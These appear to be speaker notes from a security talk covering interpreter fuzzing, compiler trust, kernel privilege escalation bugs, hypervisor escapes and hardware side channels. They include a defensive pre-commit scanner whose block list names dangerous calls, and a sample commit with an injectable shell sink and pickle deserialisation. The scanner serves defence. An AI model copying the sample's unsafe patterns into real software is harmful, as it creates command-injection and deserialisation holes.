Key takeaway: lots of crashes for only 1M iterations. Even if most are not exploitable, it shows the low quality of the software itself (bear in mind that some of the players are Facebook…)
BTW, Pythonauts: Python has a smaller number of crashes, but I didn't fuzz it for 1M iterations, only 100k
At this point (as far as I know) only Rust is actively fuzzing their own project
Shopify implemented a sandbox, hence each new bug must also affect the sandbox (this lowers the number of payouts significantly but does not eliminate them completely…)
For example at the SCM level, before a commit is accepted, or a more radical solution: nullify the whole implementation at the interpreter level (e.g. make unserialize() in PHP return nothing)
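Banning dangerous functions at the SCM level, as the note above suggests, is easiest to enforce with a pre-commit hook that decides on the AST rather than on grep, so that aliases and from-imports do not slip past. The scanner below is an added example for this page, not the talk's tooling; it is written for Python code, where pickle.loads() plays the role PHP's unserialize() plays in the PornHub case. The BANNED table, the function names and the sample commit are this example's own.

```python
import ast

# (fully qualified callable, reason). Matching is done on resolved names,
# so "import pickle as p; p.loads(...)" and "from os import system" are caught.
BANNED = {
    "pickle.loads": "deserialises arbitrary objects; use json plus schema validation",
    "pickle.load": "deserialises arbitrary objects; use json plus schema validation",
    "marshal.loads": "loads code objects from untrusted bytes",
    "os.system": "shell command injection; use subprocess with an argv list",
    "eval": "executes arbitrary expressions",
    "exec": "executes arbitrary code",
}


def _qualified_name(node, aliases):
    """Resolve eval / pickle.loads / p.loads (with 'import pickle as p') to a dotted name."""
    if isinstance(node, ast.Name):
        return aliases.get(node.id, node.id)
    if isinstance(node, ast.Attribute):
        base = _qualified_name(node.value, aliases)
        return f"{base}.{node.attr}" if base else None
    return None


def scan_source(source: str, filename: str = "<stdin>") -> list:
    """Return [(filename, lineno, message)] for every banned call, sorted by line."""
    tree = ast.parse(source, filename)
    aliases = {}  # local name -> real module or attribute it refers to
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    findings = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _qualified_name(node.func, aliases)
        if name is None:
            continue
        if name in BANNED:
            findings.append((filename, node.lineno, f"{name}: {BANNED[name]}"))
        elif name.startswith("subprocess."):
            # subprocess.* with shell=True is the same bug as os.system
            for kw in node.keywords:
                if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                    findings.append((filename, node.lineno, f"{name}(shell=True): command injection risk"))
        elif name == "yaml.load":
            # yaml.load without a safe loader instantiates arbitrary Python objects
            loader = next((kw.value for kw in node.keywords if kw.arg == "Loader"), None)
            if loader is None and len(node.args) > 1:
                loader = node.args[1]
            loader_name = _qualified_name(loader, aliases) if loader is not None else None
            if loader_name not in ("yaml.SafeLoader", "yaml.CSafeLoader"):
                findings.append((filename, node.lineno, "yaml.load without SafeLoader: use yaml.safe_load()"))
    return sorted(findings, key=lambda f: f[1])


# Constructed snippet standing in for the diff of a commit under review.
SAMPLE_COMMIT = '''
import pickle as p
import subprocess, yaml
from os import system

def handler(cookie, cfg, cmd):
    session = p.loads(cookie)
    data = yaml.load(cfg, Loader=yaml.SafeLoader)
    subprocess.run(cmd, shell=True)
    system("ls " + cmd)
    return session, data
'''
```

Wire scan_source() over the staged files in a pre-commit hook and reject the commit when it returns anything; the same function run over the whole tree in CI catches what bypassed the hook. The PHP "return nothing from unserialize()" variant from the note is the runtime counterpart: the AST check stops the call before it is merged, the nullified function stops it if it is already there.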
OK, we've solved the problems with interpreters/VMs, our programmers are well trained, but…
Our interpreter or VM still needs to be compiled (by us or by our package provider)
Can we guarantee the integrity of our internal (or external) compiler? Hard to do 100%, and this opens up doors for backdoors…
And of course we can have bugs in the compilers themselves
PDBs are debugging info; j00ru found that on Microsoft's servers there are PDBs compiled with a vulnerable version of Visual Studio that include leaked memory from the compilation phase (around 0.5%); nothing big BUT a very interesting case in point
At a certain level of sophistication there are no perfect solutions. We need to trust blindly that some elements of our chain are good
OK, we've accepted the risk with compilers, we've eliminated bugs in our apps and their dependencies, our interpreters can be trusted
Now we want to deploy and see our MVP in action
We buy shared hosting with a LAMP stack and roll out
Change in the threat model:
The CPU has different levels of trust when it comes to code execution
Modern OSes use mainly 2 of them: kernel mode (ring 0) and user mode (ring 3)
We assume that the attacker is already inside (by any means) and the game is about privilege escalation
BTW, can we trust our neighbours when it comes to shared hosting? Vulnerabilities in their applications affect all tenants on the particular server
But the number is bigger for sure (Linus and others in the Linux kernel community are well known for treating security issues as ordinary bugs until clearly proven otherwise)
They also don't like applying for CVEs
We're focusing on privilege escalation vulnerabilities; because the kernel is shared across versions (ntoskrnl), these are usually cross-version
Linux is the king of infrastructure, Windows is the king of endpoints
Dirty COW
Race condition in the memory handling mechanism when the kernel does copy-on-write
Key takeaway: present from 2007 (kernel 2.6.22) until 2016 (kernel 4.x), 9 years
KiTrap0D
Microsoft Windows NT #GP trap handler allows users to switch the kernel stack
Key takeaway: present from the original release of NT, 27.07.1993, until 2010
All 32-bit versions of Windows: Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7
POP SS, a cross-platform OS vulnerability
Misinterpretation of Intel's manuals led to wrong implementations of this mechanism across different OSes, effectively giving a way to elevate privileges
Including: Windows, macOS, FreeBSD, and Linux (at least a crash)
Hardening can be split into 2 areas:
Implementation of best practices (e.g. CIS Benchmarks)
Implementation of additional defenses
grsecurity for Linux
BONUS: LKRG by Adam Zabrocki
EMET (Enhanced Mitigation Experience Toolkit) for older Windows, EOL July 2018
PMMT (Process Mitigation Management Tool) and WDEG (Windows Defender Exploit Guard)
Shared hosting is for old people, cool kids rock the cloud
Now our applications live in a hostel with dynamically changing neighbours
The bar has been raised: the attacker needs to get in, then elevate their privileges, and then escape from the hypervisor; doubleplusgood so far…
The first public exploit for VMware with a full technical advisory (Cloudburst, 2009, by Kostya Kortchinsky from Immunity); it opened the eyes of many people
Piotr Bania wrote an exploit for that
What's Pwn2Own
Virtualization has been included in the competition since 2016, with success
Defense in depth: a robust chain of defenses including firewalls / network IDS to control access to virtual machines, anti-virus or another host IDS to block malicious software from running on a virtual machine, and the hypervisor itself to isolate virtual machines from each other.
At some point in time any of these layers may miss something important or have a bug; the goal is to have enough layers that not all can be breached simultaneously.
OK, OK, OK, we've rewritten everything in Rust and our problems are solved (trolololo).
Can we trust our hardware?
Side channels are the new black
A good example of a side channel is a conversation. The main information is exchanged through the spoken word, BUT our micro-expressions are side channels
FDIV is important because Intel lost money: "In December 1994, Intel recalled the defective processors. (…) $475 million (…) total cost associated with replacement of the flawed processors."
SYSRET is interesting because it was fixed in Linux in 2006; however, the devs didn't fully understand the implications and didn't notify other OS vendors until Rafał's revelation
The AMD microcode bug is interesting because it was found "by accident" while fuzzing software on an AMD-based machine
Meltdown & Spectre are interesting from both the technical POV and the social one: they were found by three independent teams at around exactly the same time (without any coordination), and on top of that there was already "a hunch" in the air, introduced most notably by Anders Fogh and his "negative results" blog post
Fuzzing the CPU is interesting because new opcodes were found; question time: are those glitches or features?
Intel ME has MINIX inside (yes, the academic microkernel) with the highest level of trust within your computer, because what could go wrong?
Today's RAM is built very tightly; physically the cells are _very_ close to each other, and it is possible to read memory in a certain pattern so that neighbouring cells are affected (bits flipped), hence we're able to affect the integrity of a live system (everything is 0s and 1s; if we can flip a certain 1 to 0 we can change our privileges).
Hammering attacks require some kind of code execution, hence they were local in the beginning. However, nowadays it's possible to perform them remotely, e.g. with WebGL in your browser (via the GPU on Android/ARM) and over remote direct memory access (RDMA) networking (cloud servers)